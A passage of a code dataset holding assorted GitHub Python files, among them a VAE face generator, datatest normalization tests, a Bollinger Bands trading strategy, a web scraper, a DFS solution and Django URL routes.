n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(2 * n_feature, 4 * n_feature, kernel_size=4, stride=2, padding=1,\n\t\t\t\t\t bias=False),\n\t\t\tnn.BatchNorm2d(4 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(4 * n_feature, 2 * n_feature, kernel_size=4, stride=2, padding=1,\n\t\t\t\t\t bias=False),\n\t\t\tnn.BatchNorm2d(2 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(2 * n_feature, 1 * n_feature, kernel_size=4, stride=2, padding=1,\n\t\t\t\t\t bias=False),\n\t\t\tnn.BatchNorm2d(1 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(1 * n_feature, LATENT_CODE_NUM, kernel_size=4), # output 64 * 1 * 1\n\t\t).cuda()\n\n\tdef reparameterize(self, mu, logvar):\n\t\teps = torch.randn(mu.size(0), mu.size(1)).cuda() #\n\t\tz = mu + eps * torch.exp(logvar / 2)\n\t\treturn z.cuda()\n\n\tdef forward(self, img):\n\t\tpred1, pred2 = self.Encoder_net(img), self.Encoder_net(img)\n\t\tmu = self.Encoder_cal_u(pred1.view(pred1.size(0), -1)) # get\n\t\tlogvar = self.Encoder_cal_o(pred2.view(pred2.size(0), -1)) # get\n\t\tz = self.reparameterize(mu, logvar)\n\t\tadd_u_o = self.Encoder_cal_add_u_o(z).view(z.size(0), 64, 1, 1)\n\t\toutput = self.Decoder_net(add_u_o) # get\n\t\treturn output.cuda(), mu.cuda(), logvar.cuda()\n\nvae = VAE_net()\n\nif torch.cuda.device_count() > 1:\n\tvae = nn.DataParallel(vae)\n\tvae = vae.cuda()\n\ndef loss_func(recon_x, x, mu, logvar):\n\t# BCE = F.binary_cross_entropy(recon_x, x, size_average=False)\n\t# KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\t# return BCE + KLD\n\tcriterion = torch.nn.MSELoss()\n\tl2_loss = criterion(recon_x, x)\n\tKLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\treturn l2_loss + KLD\n\n# Parallel Computing\n\noptimizer = torch.optim.Adam(vae.parameters(), lr=0.001, betas=(0.9, 0.999), eps=1e-08, weight_decay=0)\n\nif __name__ == '__main__':\n\tfile_dir = \"/home1/yixu/yixu_project/CVAE-GAN/download_script/download\"\n\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\tcuda = True if torch.cuda.is_available() else False\n\tTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor # ????\n\tdata = read_img.get_file(file_dir)\n\tdata = data.to(device)\n\n\tdataloader = DataLoader(data, batch_size=64, shuffle=True)\n\n\n\t# for this time decoder is genarate\n\t# (self, in_channels, out_channels, kernel_size, stride=1,padding=0, output_padding=0, groups=1, bias=True,dilation=1, padding_mode='zeros'):\n\t# output=(input-1)*stride+output_padding -2*padding+kernel_size\n\n\t# not same as up\n\t# output=(input-kernel_size+2*Padding)/stride + 1\n\n\tdef weights_init(m):\n\t\tif type(m) in [nn.ConvTranspose2d, nn.Conv2d]:\n\t\t\tnn.init.xavier_normal_(m.weight)\n\t\telif type(m) == nn.BatchNorm2d:\n\t\t\tnn.init.normal(m.weight, 1.0, 0.02)\n\t\t\tnn.init.constant_(m.bias, 0)\n\t\telif type(m) == nn.Linear:\n\t\t\tnn.init.normal(m.weight, 1.0, 0.02)\n\t\t\tnn.init.constant_(m.bias, 0)\n\n\n\t#\n\t#vae.Decoder_net.apply(weights_init)\n\t#vae.Encoder_net.apply(weights_init)\n\t#vae.Encoder_cal_add_u_o.apply(weights_init) # ???\n\t#vae.Encoder_cal_o.apply(weights_init)\n\t#vae.Encoder_cal_u.apply(weights_init)\n\n\tfixed_noise = torch.randn(64, 64, 1, 1).cuda() # fix it as one\n\tepoch_num = 4000\n\n\tfor epoch in range(epoch_num):\n\t\tfor batch_idx, data in enumerate(dataloader):\n\t\t\t# get data\n\t\t\timg = data.cuda()\n\t\t\tbatch_size = img.size(0)\n\t\t\ttotal_loss = 0\n\t\t\toptimizer.zero_grad()\n\t\t\trecon_img, mu, logvar = vae.forward(img)\n\n\t\t\tloss = loss_func(recon_img, img, mu, logvar)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\t\t\tif batch_idx == 1:\n\t\t\t\t#fake_img = vae.Decoder_net(fixed_noise).cuda()\n\t\t\t\tfake_img = vae.module.Decoder_net(fixed_noise).cuda()\n\t\t\t\t# path = '/home1/yixu/yixu_project/CVAE-GAN/output_VAE/images_epoch{:02d}_batch{:03d}.jpg'.format(epoch,batch_idx)\n\t\t\t\tpath = '/home1/yixu/yixu_project/CVAE-GAN/output_VAE_l2loss/images_epoch{:02d}_batch{:03d}.jpg'.format(\n\t\t\t\t\tepoch, batch_idx)\n\t\t\t\tsave_image(fake_img, path, normalize=True)\n\n\t\t\tprint('[{}/{}]'.format(epoch, epoch_num) +\n\t\t\t\t '[{}/{}]'.format(batch_idx, len(dataloader)) +\n\t\t\t\t 'loss:{:g}'.format(loss))\n","repo_name":"MasterXiYu/CVAE-GAN","sub_path":"demo/VAE_Genarate_face.py","file_name":"VAE_Genarate_face.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"27946305433","text":"try:\n import ujson as json\nexcept BaseException:\n import json\nfrom .SerializerBase import SerializerBase\n\n\nclass SerializerUJson(SerializerBase):\n\n def dumps(self, obj, sort_keys=False, indent=False):\n return json.dumps(obj, ensure_ascii=False, sort_keys=sort_keys, indent=indent)\n\n def loads(self, s):\n if isinstance(s, bytes):\n s = s.decode('utf-8')\n return json.loads(s)\n","repo_name":"ahussein/core9","sub_path":"JumpScale9/data/serializers/SerializerUJson.py","file_name":"SerializerUJson.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39271514878","text":"import torch\nimport torch.nn as nn\n\nfrom modules.conv_layer import GraphConv\nfrom modules.attention import AttentionLayer\nimport pdb\n\n\nclass MolConvNet(nn.Module):\n def __init__(self, args, use_attn=False):\n super(MolConvNet, self).__init__()\n self.args = args\n self.use_attn = use_attn\n\n self.conv_layer = GraphConv(args)\n self.output_size = args.hidden_size\n\n if self.use_attn:\n self.attn_layer = AttentionLayer(args)\n self.output_size += args.hidden_size\n\n def forward(self, mol_graph, stats_tracker=None):\n graph_inputs, scope = mol_graph.get_graph_inputs()\n atom_h = self.conv_layer(graph_inputs)\n\n attn_context = None\n if self.use_attn:\n attn_context = self.attn_layer(atom_h, scope)\n if attn_context is not None:\n atom_h = torch.cat([atom_h, attn_context], dim=1)\n\n return atom_h\n","repo_name":"benatorc/PA-Graph-Transformer","sub_path":"models/mol_conv_net.py","file_name":"mol_conv_net.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"18"} +{"seq_id":"18717421157","text":"\"\"\"Tests for normalization functions.\"\"\"\nimport sqlite3\nfrom . import _unittest as unittest\nfrom datatest.requirements import BaseRequirement\nfrom datatest._utils import IterItems\n\nfrom datatest._normalize import TypedIterator\nfrom datatest._normalize import _normalize_lazy\nfrom datatest._normalize import _normalize_eager\nfrom datatest._normalize import normalize\n\ntry:\n import squint\nexcept ImportError:\n squint = None\n\ntry:\n import pandas\nexcept ImportError:\n pandas = None\n\ntry:\n import numpy\nexcept ImportError:\n numpy = None\n\n\nclass TestNormalizeLazyUnchanged(unittest.TestCase):\n \"\"\"Test objects that should be returned unchanged.\"\"\"\n def test_nonexhaustible_iterable(self):\n data = [1, 2, 3]\n self.assertIs(_normalize_lazy(data), data)\n\n data = (1, 2, 3)\n self.assertIs(_normalize_lazy(data), data)\n\n def test_exhaustible_iterator(self):\n data = iter([1, 2, 3])\n self.assertIs(_normalize_lazy(data), data)\n\n def test_typediterator(self):\n data = TypedIterator(iter([1, 2, 3]), evaltype=tuple)\n self.assertIs(_normalize_lazy(data), data)\n\n\n@unittest.skipUnless(squint, 'requires squint')\nclass TestNormalizeLazySquint(unittest.TestCase):\n \"\"\"Test squint package's `Result` and `Query` objects.\"\"\"\n def test_sequence_result(self):\n result_object = squint.Result([1, 2, 3, 4], evaltype=list)\n normalized = _normalize_lazy(result_object)\n self.assertIs(normalized, result_object, msg='should return original object')\n\n def test_iteritems_result(self):\n result_object = squint.Result([('a', 1), ('b', 2)], evaltype=dict)\n normalized = _normalize_lazy(result_object)\n self.assertIsInstance(normalized, IterItems)\n self.assertEqual(set(normalized), set([('a', 1), ('b', 2)]))\n\n def test_query_that_returns_sequence(self):\n query_object = squint.Query.from_object([1, 2, 3, 4])\n normalized = _normalize_lazy(query_object)\n self.assertIsInstance(normalized, squint.Result)\n self.assertEqual(normalized.evaltype, list)\n\n def test_query_that_returns_noncontainer(self):\n query_object = squint.Query.from_object([1, 2, 3, 4]).sum()\n normalized = _normalize_lazy(query_object)\n self.assertEqual(normalized, 10)\n\n def test_query_that_returns_mapping(self):\n query_object = squint.Query.from_object({'a': 1, 'b': 2})\n normalized = _normalize_lazy(query_object)\n self.assertIsInstance(normalized, IterItems)\n self.assertEqual(set(normalized), set([('a', 1), ('b', 2)]))\n\n def test_select(self):\n \"\"\"Select objects should not be changed by normalization.\"\"\"\n select_object = squint.Select([['A'], [1], [2], [3], [4]])\n normalized = _normalize_lazy(select_object)\n self.assertIsInstance(normalized, squint.Select)\n\n\n@unittest.skipUnless(pandas, 'requires pandas')\nclass TestNormalizeLazyPandas(unittest.TestCase):\n def test_dataframe_with_rangeindex(self):\n \"\"\"DataFrames using a RangeIndex should be treated as sequences.\"\"\"\n data = [(1, 'a'), (2, 'b'), (3, 'c')]\n df = pandas.DataFrame(data) # Pandas auto-assigns a RangeIndex.\n result = _normalize_lazy(df)\n\n self.assertIsInstance(result, TypedIterator)\n self.assertEqual(result.fetch(), data)\n\n def test_dataframe_with_otherindex(self):\n \"\"\"DataFrames using other index types should be treated as mappings.\"\"\"\n data = [(1, 'a'), (2, 'b'), (3, 'c')]\n df = pandas.DataFrame(data, index=[0, 1, 2]) # Defines an Int64Index.\n result = _normalize_lazy(df)\n\n expected = {0: (1, 'a'), 1: (2, 'b'), 2: (3, 'c')}\n self.assertIsInstance(result, IterItems)\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_multiple_columns(self):\n data = [(1, 'a'), (2, 'b'), (3, 'c')]\n\n # RangeIndex index\n df = pandas.DataFrame(data)\n result = _normalize_lazy(df)\n self.assertEqual(list(result), data)\n\n # Int64Index index\n df = pandas.DataFrame(data, index=[0, 1, 2])\n result = _normalize_lazy(df)\n self.assertIsInstance(result, IterItems)\n expected = {0: (1, 'a'), 1: (2, 'b'), 2: (3, 'c')}\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_single_column(self):\n \"\"\"Single column DataFrame values should be unwrapped.\"\"\"\n data = [('x',), ('y',), ('z',)]\n\n # RangeIndex index\n df = pandas.DataFrame(data)\n result = _normalize_lazy(df)\n self.assertEqual(list(result), ['x', 'y', 'z'])\n\n # Int64Index index\n df = pandas.DataFrame(data, index=[0, 1, 2])\n result = _normalize_lazy(df)\n self.assertIsInstance(result, IterItems)\n expected = {0: 'x', 1: 'y', 2: 'z'}\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_multiindex(self):\n \"\"\"Multi-index values should be tuples.\"\"\"\n df = pandas.DataFrame(\n data=[('x',), ('y',), ('z',)],\n index=pandas.MultiIndex.from_tuples([(0, 0), (0, 1), (1, 0)]),\n )\n result = _normalize_lazy(df)\n self.assertIsInstance(result, IterItems)\n expected = {(0, 0): 'x', (0, 1): 'y', (1, 0): 'z'}\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_index_error(self):\n \"\"\"Indexes must contain unique values, no duplicates.\"\"\"\n df = pandas.DataFrame([('x',), ('y',), ('z',)], index=[0, 0, 1])\n with self.assertRaises(ValueError):\n _normalize_lazy(df)\n\n def test_series_with_rangeindex(self):\n \"\"\"Series using a RangeIndex should be treated as sequences.\"\"\"\n data = ['x', 'y', 'z']\n s = pandas.Series(data) # Pandas auto-assigns a RangeIndex.\n result = _normalize_lazy(s)\n\n self.assertIsInstance(result, TypedIterator)\n self.assertEqual(result.fetch(), data)\n\n def test_series_with_otherindex(self):\n \"\"\"Series using other index types should be treated as mappings.\"\"\"\n data = ['x', 'y', 'z']\n s = pandas.Series(data, index=[0, 1, 2]) # Defines an Int64Index.\n result = _normalize_lazy(s)\n\n expected = {0: 'x', 1: 'y', 2: 'z'}\n self.assertIsInstance(result, IterItems)\n self.assertEqual(dict(result), expected)\n\n def test_series_multiindex(self):\n \"\"\"Multi-index values should be tuples.\"\"\"\n s = pandas.Series(\n data=['x', 'y', 'z'],\n index=pandas.MultiIndex.from_tuples([(0, 0), (0, 1), (1, 0)]),\n )\n result = _normalize_lazy(s)\n self.assertIsInstance(result, IterItems)\n expected = {(0, 0): 'x', (0, 1): 'y', (1, 0): 'z'}\n self.assertEqual(dict(result), expected)\n\n def test_series_index_error(self):\n \"\"\"Indexes must contain unique values, no duplicates.\"\"\"\n s = pandas.Series(['x', 'y', 'z'], index=[0, 0, 1])\n with self.assertRaises(ValueError):\n _normalize_lazy(s)\n\n\n@unittest.skipUnless(numpy, 'requires numpy')\nclass TestNormalizeLazyNumpy(unittest.TestCase):\n def test_two_dimentional_array(self):\n arr = numpy.array([['a', 'x'], ['b', 'y']])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), [('a', 'x'), ('b', 'y')])\n\n def test_two_valued_structured_array(self):\n arr = numpy.array([('a', 1), ('b', 2)],\n dtype=[('one', 'U10'), ('two', 'i4')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), [('a', 1), ('b', 2)])\n\n def test_two_valued_recarray_array(self): # record array\n arr = numpy.rec.array([('a', 1), ('b', 2)],\n dtype=[('one', 'U10'), ('two', 'i4')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), [('a', 1), ('b', 2)])\n\n def test_one_dimentional_array(self):\n arr = numpy.array(['x', 'y', 'z'])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), ['x', 'y', 'z'])\n\n def test_single_valued_structured_array(self):\n arr = numpy.array([('x',), ('y',), ('z',)],\n dtype=[('one', 'U10')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), ['x', 'y', 'z'])\n\n def test_single_valued_recarray_array(self): # record array\n arr = numpy.rec.array([('x',), ('y',), ('z',)],\n dtype=[('one', 'U10')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), ['x', 'y', 'z'])\n\n def test_three_dimentional_array(self):\n \"\"\"Three-dimentional array normalization is not supported.\"\"\"\n arr = numpy.array([[[1, 3], ['a', 'x']], [[2, 4], ['b', 'y']]])\n result = _normalize_lazy(arr)\n self.assertIs(result, arr, msg='unsupported, returns unchanged')\n\n\nclass TestNormalizeLazyDBAPI2Cursor(unittest.TestCase):\n def setUp(self):\n conn = sqlite3.connect(':memory:')\n conn.executescript('''\n CREATE TABLE mydata(A, B, C);\n INSERT INTO mydata VALUES('x', 'foo', 20);\n INSERT INTO mydata VALUES('x', 'foo', 30);\n INSERT INTO mydata VALUES('y', 'foo', 10);\n INSERT INTO mydata VALUES('y', 'bar', 20);\n INSERT INTO mydata VALUES('z', 'bar', 10);\n INSERT INTO mydata VALUES('z', 'bar', 10);\n ''')\n self.cursor = conn.cursor()\n\n def test_multiple_coumns(self):\n self.cursor.execute('SELECT A, B FROM mydata;')\n result = _normalize_lazy(self.cursor)\n self.assertEqual(\n list(result),\n [('x', 'foo'), ('x', 'foo'), ('y', 'foo'),\n ('y', 'bar'), ('z', 'bar'), ('z', 'bar')],\n )\n\n def test_single_column(self):\n \"\"\"Single column selections should be unwrapped.\"\"\"\n self.cursor.execute('SELECT C FROM mydata;')\n result = _normalize_lazy(self.cursor)\n self.assertEqual(list(result), [20, 30, 10, 20, 10, 10])\n\n\nclass TestNormalizeEager(unittest.TestCase):\n def test_unchanged(self):\n \"\"\"For given instances, should return original object.\"\"\"\n requirement = [1, 2, 3]\n self.assertIs(_normalize_eager(requirement), requirement)\n\n class MyRequirement(BaseRequirement):\n def __init__(self):\n pass\n\n def __iter__(self):\n return iter([])\n\n def check_data():\n return None\n\n requirement = MyRequirement()\n self.assertIs(_normalize_eager(requirement), requirement)\n\n def test_exhaustible_type(self):\n with self.assertRaises(TypeError, msg='cannot use generic iter'):\n _normalize_eager(iter([1, 2, 3]))\n\n output = _normalize_eager(iter([1, 2, 3]), default_type=set)\n self.assertEqual(output, set([1, 2, 3]))\n\n @unittest.skipUnless(squint, 'requires squint')\n def test_squint_object(self):\n result_obj = squint.Result(iter([1, 2, 3]), evaltype=tuple)\n output = _normalize_eager(result_obj)\n self.assertIsInstance(output, tuple)\n self.assertEqual(output, (1, 2, 3))\n\n def test_iter_items(self):\n items = IterItems(iter([(0, 'x'), (1, 'y'), (2, 'z')]))\n output = _normalize_eager(items)\n self.assertIsInstance(output, dict)\n self.assertEqual(output, {0: 'x', 1: 'y', 2: 'z'})\n","repo_name":"shawnbrown/datatest","sub_path":"tests/test_normalize.py","file_name":"test_normalize.py","file_ext":"py","file_size_in_byte":11655,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"18"} +{"seq_id":"8833470864","text":"def compute_stop_positions():\r\n import math\r\n from math import sin\r\n\r\n Stop_positions = []\r\n Nsp = 0\r\n Psp=0\r\n cam_fov = 90 # in degrees\r\n rail_lenght = 100 #in meters\r\n max_obj_distance = 15 # in meters\r\n half_fov= cam_fov/2\r\n n = 90 - half_fov\r\n r = sin(math.radians(n))\r\n initial_pos = max_obj_distance * sin(math.radians(half_fov)) / sin(math.radians(n))\r\n\r\n r_initial_pos = round(initial_pos)\r\n Psp = r_initial_pos\r\n # print(r_initial_pos)\r\n Stop_positions.append(r_initial_pos)\r\n\r\n #print(Stop_positions)\r\n Nsp = r_initial_pos + 0.5*r_initial_pos\r\n Stop_positions.append(round(Nsp))\r\n\r\n #print(round(Nsp))\r\n while Nsp < rail_lenght:\r\n Psp = Nsp\r\n Nsp = Psp + round(0.5*Psp)\r\n if Nsp < rail_lenght:\r\n Stop_positions.append(round(Nsp))\r\n Psp += Nsp\r\n # print(Stop_positions)\r\n return Stop_positions\r\n\r\n#implement the movement\r\ncur_location = 0\r\nstop_pos = compute_stop_positions()\r\n\r\n\r\nfor position in stop_pos:\r\n cur_location = position\r\n if cur_location == position:\r\n #move camera to the position\r\n print(\"Camera is at \" + str(cur_location))\r\n # stop camera\r\n #take snap shot\r\n continue\r\n \r\n #","repo_name":"ubong-essien/Attendance-systemin-python","sub_path":"camera_control.py","file_name":"camera_control.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71180879721","text":"from nbc import *\nfrom vanilla import *\nfrom data import *\nfrom matplotlib import pyplot as plt\n\nif __name__ == \"__main__\":\n\n sizes = [1, 5, 10, 20, 25, 30, 40, 50, 60, 70, 80, 90, 99]\n losses = []\n nbc_losses = []\n maxIter = 2\n for size in sizes:\n X = load_data(\"yelp_cat.csv\")\n x1, x2 = split_data(X, size)\n save_split(x1, x2)\n X = load_data(\"train-set.csv\")\n Xt = load_data(\"test-set.csv\")\n\n nbc = NBC(X.as_matrix(), Xt.as_matrix())\n nbc.train()\n nbcloss = nbc.predict_test()\n nbc_losses.append(nbcloss)\n print(\"nbc ZERO-ONE LOSS=\" + str(nbcloss))\n\n y = X['goodForGroups'].as_matrix()\n yt = Xt['goodForGroups'].as_matrix()\n mergeDf = binarize(X, Xt)\n X, Xt = split_vector(mergeDf[0], mergeDf[1])\n nn = train(X, maxIter, y)\n loss = predict_batch(Xt, yt, nn)\n losses.append(loss)\n print(\"pcp ZERO-ONE LOSS=\" + str(loss))\n print(\"\")\n\n plt.plot(sizes, losses)\n plt.plot(sizes, nbc_losses)\n plt.xlabel(\"Training set size %\")\n plt.ylabel(\"Zero one loss\")\n plt.show()\n","repo_name":"exponentialbit1024/PurdueCS","sub_path":"CS373/shah255-hw4/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"31205383100","text":"def read_matrix_as_dict(arr):\n ans = {}\n for i in range(len(states)):\n line = [float(x) for x in f.readline().split()[1:]]\n for (ind, x) in enumerate(line):\n ans[(states[i], arr[ind])] = x\n return ans\n\n\ndef skip(n):\n for _ in range(n):\n f.readline()\n\n\ndef reverse_string(str):\n return ''.join(str[::-1])\n\n\nif __name__ == '__main__':\n with open('rosalind_ba10c.txt', 'r') as f:\n input_string = f.readline().rstrip()\n skip(1)\n abc = f.readline().split()\n skip(1)\n states = f.readline().split()\n skip(2)\n t_matrix = read_matrix_as_dict(states)\n\n skip(2)\n e_matrix = read_matrix_as_dict(abc)\n\n scores = {(0, state): e_matrix[state, input_string[0]] * 1 / len(states) for state in states}\n next_states = {(0, state): '' for state in states}\n last_char = None\n for (idx, ch) in enumerate(input_string[1:]):\n for state in states:\n max_next_score = None\n for next_state in states:\n temp = (scores[idx, next_state] * t_matrix[next_state, state], next_state)\n if max_next_score is None or max_next_score < temp:\n max_next_score = temp\n scores[idx + 1, state] = max_next_score[0] * e_matrix[state, ch]\n next_states[idx + 1, state] = max_next_score[1]\n if idx == len(input_string) - 2:\n temp = (scores[idx + 1, state], state)\n if last_char is None or temp > last_char:\n last_char = temp\n\n ans = str(last_char[1])\n for i in range(len(input_string) - 1, -1, -1):\n ans += next_states[i, ans[-1]]\n\n print(reverse_string(ans))\n","repo_name":"paskudnicc/Itmo","sub_path":"3 year/bioinf/ba10c.py","file_name":"ba10c.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11071066494","text":"# -*- coding: utf-8 -*-\n# @Author : xiaohao\n# @Email : 321459055@qq.com\n# @File : comment_block.py\n# @Software: PyCharm\n# @Time : 2020/7/31 17:08\n\n\nfrom django import template\n\nfrom apps.comment.form import CommentForm\nfrom apps.comment.models import Comment\n\nregister = template.Library()\n\n\n@register.inclusion_tag('block.html')\ndef comment_block(target):\n \"\"\"Removes all values of arg from the given string\"\"\"\n return {\n 'target': target,\n 'comment_form': CommentForm(),\n 'comment_list': Comment.get_by_target(target)\n }\n","repo_name":"xiaohaogit/blog","sub_path":"myblog/apps/comment/templatetags/comment_block.py","file_name":"comment_block.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71803166440","text":"\nimport sys\nimport os\nimport subprocess\n\nswig = sys.argv[1]\nargs = []\nfor arg in sys.argv[2:]:\n if arg.startswith('--FIX,'):\n inc_dirs = arg[6:].split(',SEP,')\n for inc_dir in inc_dirs:\n args.append('-I' + inc_dir)\n else:\n args.append(arg)\n\ncmdline = [swig] + args\n\nif 'VERBOSE' in os.environ:\n print('Fixed swig command line: ' + ' '.join(cmdline))\n\nsys.exit(subprocess.run(cmdline).returncode)\n","repo_name":"QuTech-Delft/OpenQL","sub_path":"python/compat/fix-swig-cmdline.py","file_name":"fix-swig-cmdline.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"18"} +{"seq_id":"24860961613","text":"import pandas as pd\nimport numpy as np\nfrom mod_backtest_utils.backtest import *\n\nclass BBStrategy(Strategy):\n \"\"\"\n Requires:\n symbol: A stock symbol on which to form a strategy\n bars: A DataFrame of bars for the above symbol\n period: Look back period for BB indicator calculation\n stdmultiplier: the parameter to generate upper and lower band\n \n \"\"\"\n \n def __init__(self, symbol, bars, period, stdmultiplier):\n self.symbol = symbol\n self.bars = bars\n self.period = period\n self.stdmultiplier = stdmultiplier\n \n def generate_signals(self):\n \"\"\"\n Returns the DataFrame of symbols containing the signals to go long, short or hold (1, -1, 0)\n \"\"\"\n # initialize data frame of signals with the date from price data frame\n signals = pd.DataFrame(index=self.bars.index)\n signals['price'] = self.bars['price']\n \n # create bb value\n signals['middleband'] = signals['price'].rolling(window=self.period).mean()\n signals['upperband'] = signals['middleband'] + self.stdmultiplier * (signals['price'].rolling(window= self.period).std())\n signals['lowerband'] = signals['middleband'] - self.stdmultiplier * (signals['price'].rolling(window= self.period).std())\n\n # Create a signal (invested or not invested) \n # buy signal when rsi values crosses buy_threshold from bottom\n # sell signal when rsi values crosses sell_threshold from top\n signals['sell']= 0.0\n signals['buy']= 0.0\n signals['buy'][self.period:] = np.where(signals['price'][self.period:] < signals['lowerband'][self.period:], -1.0, 0.0)\n signals['sell'][self.period:] = np.where(signals['price'][self.period:] > signals['upperband'][self.period:],1.0,0)\n signals['buy'] = signals['buy'].diff()\n signals['sell'] = signals['sell'].diff()\n signals.loc[signals['buy'] == -1.0,['buy']]=0 \n signals.loc[signals['sell'] == 1.0,['sell']]=0 \n signals['buy_sell'] = signals['buy'] + signals['sell']\n return signals[['price', 'buy_sell']]","repo_name":"secmldev/stock-trading","sub_path":"mod_backtest_utils/backtest_bb.py","file_name":"backtest_bb.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10468963872","text":"#!/usr/bin/env python\n # -*- coding: utf-8 -*-\n\nfrom mongoimporter import MongoImporter\nfrom pyquery import PyQuery\nimport urlparse\nimport mechanize\n\n\nclass VerlagScraper:\n\n def __init__(self):\n self.current_url = 'http://daten.ivw.eu/index.php?menuid=13&b=alle'\n\n self.__get_html_data()\n\n def __get_html_data(self):\n verlag_req = mechanize.Request(self.current_url)\n verlag_res = mechanize.urlopen(verlag_req)\n mongo = MongoImporter(coll=\"verlag\")\n\n py_query = PyQuery(verlag_res.read())\n link_list = py_query(\".lz_r a\")\n for link in link_list:\n query = urlparse.urlparse(py_query(link).attr('href')).query\n parsed_query = urlparse.parse_qs(query)\n vid = parsed_query['m'][0]\n title = parsed_query['t'][0].replace(\"Titel des Verlags \", \"\").replace('\"', '')\n decoded = title.replace(\"'\", \"\").replace(\"\\xed\", \"i\").replace(\"\\xd6\", \"Oe\").replace(\"\\xf6g\", \"oe\").replace(\"\\xdc\", \"UE\").replace(\"\\xf6\", \"ue\").replace(\"\\xfc\", \"ue\").replace(\"\\xdf\", \"ss\").replace(\"\\xc4\", \"Ae\").replace(\"\\xfc\", \"ae\").replace(\"\\xe0\", \"a\").replace(\"\\xe4\", \"ae\").replace(\"\\xe9\", \"e\")\n json = ({\"vid\": vid, \"title\": decoded})\n if decoded:\n mongo.insert_json(json)\n","repo_name":"g-div/ivw-viz","sub_path":"scraper/scraper/verlagscraper.py","file_name":"verlagscraper.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"27739557508","text":"import sys\r\n\r\nsys.setrecursionlimit(10 ** 6)\r\nMAX = 100000 + 10\r\nN, M, R = map(int, sys.stdin.readline().split())\r\ngraph = [[] for _ in range(MAX)]\r\nvisited = [False for _ in range(MAX)]\r\n\r\nglobal answer\r\nanswer = [0 for _ in range(N)]\r\nglobal order\r\norder = 1\r\n\r\nfor _ in range(M):\r\n x, y = map(int, sys.stdin.readline().split())\r\n graph[x].append(y)\r\n graph[y].append(x)\r\n\r\nfor i in range(1, N + 1):\r\n graph[i].sort()\r\n\r\n\r\ndef dfs(idx):\r\n visited[idx] = True\r\n global order\r\n answer[idx-1] = order\r\n order += 1\r\n\r\n data = graph[idx]\r\n for j in range(len(data)):\r\n new_idx = data[j]\r\n if not visited[new_idx]:\r\n dfs(new_idx)\r\n\r\n\r\ndfs(R)\r\n\r\nfor k in answer:\r\n print(k)\r\n","repo_name":"ZhenxiKim/leetCode","sub_path":"백준/Silver/24479. 알고리즘 수업 - 깊이 우선 탐색 1/알고리즘 수업 - 깊이 우선 탐색 1.py","file_name":"알고리즘 수업 - 깊이 우선 탐색 1.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14793058095","text":"\nfrom .views import SumLikelihoodByYearView, InsightsByCountryView,AverageIntensityByTopicView, InsightsByTopicSectorView,InsightsScatterPlotView, InsightsByRegionView\nfrom django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\n\n\n\nurlpatterns = [\n # path(\"\", include(router.urls)),\n path(\"intensity/\", AverageIntensityByTopicView.as_view(), name=\"intensity\" ),\n path(\"countryview/\", InsightsByCountryView.as_view(), name=\"country\" ),\n path(\"likelihood_by_yearview/\", SumLikelihoodByYearView.as_view(), name=\"likelihood\" ),\n path(\"insights_by_region/\", InsightsByRegionView.as_view(), name=\"region\" ),\n path(\"insights_by_topic_sector/\", InsightsByTopicSectorView.as_view(), name=\"topic\" ),\n path(\"insights_by_scatter_plotview/\", InsightsScatterPlotView.as_view(), name=\"scatter\" 